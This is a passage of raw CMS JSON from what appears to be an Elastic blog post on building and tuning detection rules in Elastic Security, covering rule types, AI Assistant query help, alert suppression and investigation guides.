existing rules\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, and add new ones. We listen to our community’s feedback and constantly look for the false positive reduction possibilities and performance improvements, which are reflected in the rule query updates.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7a606d298065fd04"}}},{"image":{"image":{"uid":"blta2e80963511e6c2d","_version":1,"title":"3.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:15:30.900Z","updated_at":"2024-10-25T17:15:30.900Z","content_type":"image/png","file_size":"231897","filename":"3.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:05.860Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta2e80963511e6c2d/671bd23299511e17478fc32f/3.png"},"_metadata":{"uid":"csa04d57bdc7a476ae"},"caption_l10n":"Figure 3. Ongoing Elastic prebuilt rules updates, 2024","alt_text_l10n":"Figure 3. Ongoing Elastic prebuilt rules updates, 2024","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb4ff91e01a0ec4c8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith biweekly \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/prebuilt-rules-management.html#update-prebuilt-rules\"\u003e\u003cspan style='font-size: 12pt;'\u003eupdates\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, you can always see what exactly has changed in the rule in a convenient side-by-side view as shown below.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csf7654b8247ba54e9"}}},{"image":{"image":{"uid":"blt9d72e32d9edd75bd","_version":1,"title":"4.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:54:12.241Z","updated_at":"2024-10-25T17:54:12.241Z","content_type":"image/png","file_size":"438276","filename":"4.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:05.988Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9d72e32d9edd75bd/671bdb44062510c4f4431549/4.png"},"_metadata":{"uid":"cs96c2ee0affa8d51f"},"caption_l10n":"Figure 4. Rule updates side by side","alt_text_l10n":"Figure 4. Rule updates side by side","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs76cdf576d8eb9e49"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIf you have suggestions or feedback or want to contribute, you can always open an issue in the public \u003c/span\u003e\u003ca href=\"https://github.com/elastic/detection-rules/blob/main/CONTRIBUTING.md\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003edetection rules repository\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(255, 153, 0);font-size: 12pt;\"\u003e \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eand follow our development process there.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eUsing detection rules, you will notice that some rules \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/building-block-rule.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003emark alerts as building blocks\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, which means they are not meant for triage and/or investigation and will not show up in the default \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAlerts\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e view.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs801ed09df32b97a1"}}},{"image":{"image":{"uid":"blt054977e04ea442a7","_version":1,"title":"5.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:54:25.440Z","updated_at":"2024-10-25T17:54:25.440Z","content_type":"image/png","file_size":"103470","filename":"5.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.093Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt054977e04ea442a7/671bdb51e695387676a65a05/5.png"},"_metadata":{"uid":"cs0225b7981bc491c4"},"caption_l10n":"Figure 5. Show building block alerts in the Alerts table","alt_text_l10n":"Figure 5. Show building block alerts in the Alerts table","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csaca6e10cafe359ad"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBuilding block rules (BBR) are there to elevate atomic activity for threat-hunting purposes and influence risk scores of entities. You can build more robust rules on top of such building block alerts.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you are interested in more threat-hunting use cases, read \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security-labs/elevate-your-threat-hunting\"\u003e\u003cspan style='font-size: 12pt;'\u003ethis article\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and visit the \u003c/span\u003e\u003ca href=\"https://github.com/elastic/detection-rules/blob/main/hunting/README.md\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003ethreat hunting folder\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e of the detection rules repository to check out the hunting library.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Expanding detection coverage with custom rules","_metadata":{"uid":"cs7e80cd060934f859"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith the basic coverage provided by Elastic Security’s out-of-the-box rules, you will typically need additional rules to accommodate your specific use cases or the technology that you need to monitor. This is where our advanced correlation capabilities come in handy to find threats and anomalies.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDepending on the use case you are trying to detect, you’ll begin by choosing one of the available \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/about-rules.html\"\u003e\u003cspan style='font-size: 12pt;'\u003erule types\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csbdb43e573410faed"}}},{"image":{"image":{"uid":"blt8a73ebae36f28c05","_version":1,"title":"6.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:54:33.628Z","updated_at":"2024-10-25T17:54:33.628Z","content_type":"image/png","file_size":"497261","filename":"6.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.185Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8a73ebae36f28c05/671bdb5965b6a09088af2a91/6.png"},"_metadata":{"uid":"cs303f76c6448504d3"},"caption_l10n":"Figure 6. Rule creation page","alt_text_l10n":"Figure 6. Rule creation page","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Query rule types","_metadata":{"uid":"cs5bf4b0930cae77ae"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eYou can write your detection logic in ES|QL, Kibana Query Language (KQL), Lucene, or EQL.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-esql-rule\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eES|QL rule\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e type allows you to write a very flexible detection logic, passing data from one part of the query to the other and manipulating it in the query itself. \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-language.html\" target=\"_self\"\u003eES|QL\u003c/a\u003e is the newest of Elastic query languages and is in active development, so keep an eye out for new capabilities that will be useful in detection use cases.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-custom-rule\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecustom query\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e rule type is useful for the single event match — queries can be written in KQL or Lucene.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-eql-rule\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eevent correlation\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e rule type is great for event sequence detection and can be written in EQL. You can also use this rule type to detect if an event is missing in a sequence.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong \u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Level up rule creation with AI assistant","_metadata":{"uid":"cs6f4f91e644f27d47"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf your rule query has errors, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/security-assistant.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e is ready to help and provide an improved query that can be instantly updated right from the assistant view. Elastic AI Assistant is available at the Enterprise license tier.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs41bd7c21b75eaa03"}}},{"image":{"image":{"uid":"blt84b42071daf77ef5","_version":1,"title":"7.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:54:42.791Z","updated_at":"2024-10-25T17:54:42.791Z","content_type":"image/png","file_size":"75845","filename":"7.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.334Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt84b42071daf77ef5/671bdb6206251004d243154d/7.png"},"_metadata":{"uid":"csdd352e9a18efc44c"},"caption_l10n":"Figure 7. Elastic AI Assistant helps resolve query issues","alt_text_l10n":"Figure 7. Elastic AI Assistant helps resolve query issues","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"image":{"image":{"uid":"blte3a6dcbb910080d4","_version":1,"title":"8.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:54:47.931Z","updated_at":"2024-10-25T17:54:47.931Z","content_type":"image/png","file_size":"246041","filename":"8.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:05.916Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte3a6dcbb910080d4/671bdb674469caddb37b7175/8.png"},"_metadata":{"uid":"cs5d4f45537abbca3d"},"caption_l10n":"Figure 8. Update query in the rule creation form with Elastic AI Assistant suggestion","alt_text_l10n":"Figure 8. Update query in the rule creation form with Elastic AI Assistant suggestion","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa509e0deb250eed3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFurthermore, Elastic AI Assistant can help create a rule query from scratch if given the specific use case you want to detect.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs08dbf49d153a364a"}}},{"image":{"image":{"uid":"blt479a2b7a3ce11d25","_version":1,"title":"9-correct.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-14T22:59:13.956Z","updated_at":"2024-11-14T22:59:13.956Z","content_type":"image/png","file_size":"453051","filename":"9-correct.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-14T22:59:23.305Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt479a2b7a3ce11d25/673680c1b35d6643f56d8050/9-correct.png"},"_metadata":{"uid":"csda370cafc85da6b1"},"caption_l10n":"Figure 9. Elastic AI Assistant creates query based on user input","alt_text_l10n":"Figure 9. Elastic AI Assistant creates query based on user input","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csba9d9deba0ca8d1d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/security-assistant.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e can be used in all security workflows and is especially helpful in alert analysis, streamlining workflows, and automating triage and remediation.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7dbfef4e3bbbfaf1"}}},{"callout":{"title_l10n":"","_metadata":{"uid":"cs14c975d25e64ce48"},"paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePro tip! \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eMake sure to use the custom knowledge base within \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/security-assistant.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant for Security\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to get the most relevant and on-point answers to your questions.\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs9012232a527ec17e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eKeep an eye on developments in this and other \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/ai\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003egenerative AI capabilities\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e in Elastic Security as they become more and more powerful.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Addressing special detection use cases","_metadata":{"uid":"cs44d01b658c199660"},"header_style":"H3","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTo detect anomalous behaviors in your events, use the ML rule type. This rule type creates alerts for anomalies and outliers identified with ML jobs, where severities exceed the predefined threshold. There are many \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eML jobs available out-of-the-box\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e with their respective SIEM rules that you can enable directly from Elastic Security, or you can create custom ML jobs and rules.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs23b25d8d42825292"}}},{"image":{"image":{"uid":"blt82328d130b1e38c4","_version":1,"title":"10.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:55:05.634Z","updated_at":"2024-10-25T17:55:05.634Z","content_type":"image/png","file_size":"132105","filename":"10.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.116Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt82328d130b1e38c4/671bdb792211ed7c5deb51e9/10.png"},"_metadata":{"uid":"csce92367cbca290ee"},"caption_l10n":"Figure 10. Prebuilt ML jobs","alt_text_l10n":"Figure 10. Prebuilt ML jobs","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs339c8ff4da43bf28"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eUse the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-threshold-rule\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ethreshold\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e rule type to alert when the volume of events and cardinality of a field exceeds the threshold, such as multiple failed logins from the same username and 10 different source IP addresses.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-new-terms-rule\" target=\"_self\"\u003e\u003cspan style='font-size: 12pt;'\u003eNew terms\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e rules find a new term that was not seen before in the historical time window, such as successful authentication from a new user to a critical server.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-indicator-rule\" target=\"_self\"\u003e\u003cspan style='font-size: 12pt;'\u003eIndicator match\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e helps detect matches between incoming threat intelligence and logs or logs with the predetermined list of indicators. For example, a user requesting access to a known malicious domain or url (a known bad) can be an indicator of compromise.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou can also write rules \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/building-block-rule.html#_set_up_rules_that_run_on_alert_indices\"\u003e\u003cspan style='font-size: 12pt;'\u003ebased on the BBR alerts\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e from other so-called higher order rules. An example of a higher order rule is the detection of an alert sequence that indicates an attack chain and spans multiple tactics and techniques or if multiple building block alerts are triggered for the same user/host/IP, indicating a highly suspicious activity.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhile working on the rule, it is important to check if it behaves as expected! You can do this using \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#preview-rules\"\u003e\u003cspan style='font-size: 12pt;'\u003epreview functionality\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csdc7366a48806cf28"}}},{"image":{"image":{"uid":"bltef2db790a9116e76","_version":1,"title":"11.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:55:16.807Z","updated_at":"2024-10-25T17:55:16.807Z","content_type":"image/png","file_size":"108722","filename":"11.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.225Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltef2db790a9116e76/671bdb84ca492ab478b50707/11.png"},"_metadata":{"uid":"cs3fcd540058df9460"},"caption_l10n":"Figure 11. Rule preview ","alt_text_l10n":"Figure 11. Rule preview ","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"Deduplicate alerts with alert suppression","_metadata":{"uid":"cs38f3828f520d6685"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAlert noise can be reduced by using \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/alert-suppression.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ealert suppression\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. When tuning for suppression, you can select up to three fields to suppress by and choose whether to suppress alerts per each rule execution or for a specified period of time.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cscf82044dc6394412"}}},{"image":{"image":{"uid":"blt35e0e85327477ec7","_version":1,"title":"12.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:55:21.694Z","updated_at":"2024-10-25T17:55:21.694Z","content_type":"image/png","file_size":"90999","filename":"12.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.348Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt35e0e85327477ec7/671bdb896fdaa6effe703f0b/12.png"},"_metadata":{"uid":"cs5f83878acd1e7fec"},"caption_l10n":"Figure 12. Alert suppression settings","alt_text_l10n":"Figure 12. Alert suppression settings","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd19fa7fe65750987"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDuring rule execution, alerts with matching suppression fields are grouped and only one alert is created — this includes the counter of grouped alerts. Analysts can see the number of detections with the same suppression fields, the suppressed values, and the suppression start and end time range but are not flooded with a huge number of duplicate alerts.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csceb09c75cf1ed8ab"}}},{"image":{"image":{"uid":"blt1c846cfef9f1f73c","_version":1,"title":"13.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:55:35.121Z","updated_at":"2024-10-25T17:55:35.121Z","content_type":"image/png","file_size":"121653","filename":"13.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:05.941Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1c846cfef9f1f73c/671bdb9791ff447e1ad6e44e/13.png"},"_metadata":{"uid":"cs297deb513e5ff412"},"caption_l10n":"Figure 13. Alerts table with suppressed alerts","alt_text_l10n":"Figure 13. Alerts table with suppressed alerts","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs121af8ee3b302a81"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you need to view the original events for the suppressed alerts, you can copy and run the rule query for a needed time frame in \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/discover.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eDiscover\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e or \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/timelines-ui.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eTimeline\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Reduce mean time to respond (MTTR) with additional alert context ","_metadata":{"uid":"cs428b2968a2393690"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe recommend \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#rule-ui-advanced-params\"\u003e\u003cspan style='font-size: 12pt;'\u003eadding information to each rule\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to help analysts investigate alerts faster. Adding information could be mapping to MITRE ATT\u0026amp;CK, adding a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/timeline-templates-ui.html\"\u003e\u003cspan style='font-size: 12pt;'\u003etimeline template\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, guiding responses with the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/interactive-investigation-guides.html#add-ig-actions-rule\"\u003e\u003cspan style='font-size: 12pt;'\u003einteractive\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e investigation guide, or setting up actions to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#rule-notifications\"\u003e\u003cspan style='font-size: 12pt;'\u003esend notifications\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#rule-response-action\"\u003e\u003cspan style='font-size: 12pt;'\u003erespond\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to alerts.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs36cf7f18f8479465"}}},{"image":{"image":{"uid":"blt0e74a3c362e32337","_version":1,"title":"14.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:55:44.166Z","updated_at":"2024-10-25T17:55:44.166Z","content_type":"image/png","file_size":"133293","filename":"14.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.048Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0e74a3c362e32337/671bdba09603ee6303b19b7f/14.png"},"_metadata":{"uid":"cs3fb3ce95d1cfad5b"},"caption_l10n":"Figure 14. Interactive investigation guide","alt_text_l10n":"Figure 14. Interactive investigation guide","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"image":{"image":{"uid":"blt02ddf5fa41003556","_version":1,"title":"15.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:55:53.655Z","updated_at":"2024-10-25T17:55:53.655Z","content_type":"image/png","file_size":"85603","filename":"15.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.135Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt02ddf5fa41003556/671bdba9fae3bbf3486bcf2d/15.png"},"_metadata":{"uid":"csdad62c786ad91689"},"caption_l10n":"Figure 15. Rule actions","alt_text_l10n":"Figure 15. Rule actions","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5ffe87b28b5d3f68"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo further streamline analysis, you can set up \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#rule-ui-advanced-params\"\u003e\u003cspan style='font-size: 12pt;'\u003ecustom highlighted fields\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0df3e2f23ab99233"}}},{"image":{"image":{"uid":"blt0ed7d2a622094961","_version":1,"title":"Screenshot 2024-10-25 at 1.57.48 PM.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-25T17:58:04.686Z","updated_at":"2024-10-25T17:58:04.686Z","content_type":"image/png","file_size":"361145","filename":"Screenshot_2024-10-25_at_1.57.48_PM.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:06.242Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0ed7d2a622094961/671bdc2cdb70c1332ff191b9/Screenshot_2024-10-25_at_1.57.48_PM.png"},"_metadata":{"uid":"cs573b5da085c527ff"},"caption_l10n":"Figure 16. Highlighted fields in the alert view","alt_text_l10n":"Figure 16. Highlighted fields in the alert view","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":"width-medium: 